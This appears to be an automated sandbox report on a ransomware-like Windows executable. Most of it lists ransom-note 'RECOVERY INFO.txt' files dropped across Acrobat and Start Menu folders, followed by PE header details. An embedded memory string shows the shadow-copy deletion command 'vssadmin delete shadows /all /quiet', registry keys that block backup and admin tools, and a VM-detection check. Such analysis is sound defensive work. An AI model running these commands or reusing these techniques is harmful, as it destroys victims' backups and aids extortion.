Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior

Source: 2b7cu0KwZl.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 2b7cu0KwZl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2b7cu0KwZl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2b7cu0KwZl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2b7cu0KwZl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2b7cu0KwZl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2b7cu0KwZl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 2b7cu0KwZl.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 2b7cu0KwZl.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: 2b7cu0KwZl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2b7cu0KwZl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2b7cu0KwZl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2b7cu0KwZl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2b7cu0KwZl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe

Jump to behavior

Source: 2b7cu0KwZl.exe

Binary or memory string: SeTakeOwnershipPrivilegeSeDebugPrivilegePowrProf.dllPowerSetActiveScheme\sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exep

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\7-Zip\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessibility\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\AutoItX\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Java\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office Tools\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\System Tools\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\Windows PowerShell\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\All Users\Start Menu\Programs\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\Default\Start Menu\Programs\System Tools\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\user\Start Menu\Programs\Accessibility\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\user\Start Menu\Programs\Accessories\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\user\Start Menu\Programs\System Tools\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Documents and Settings\user\Start Menu\Programs\Windows PowerShell\RECOVERY INFO.txt	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe TID: 7432	Thread sleep time: -60000s >= -30000s			Jump to behavior
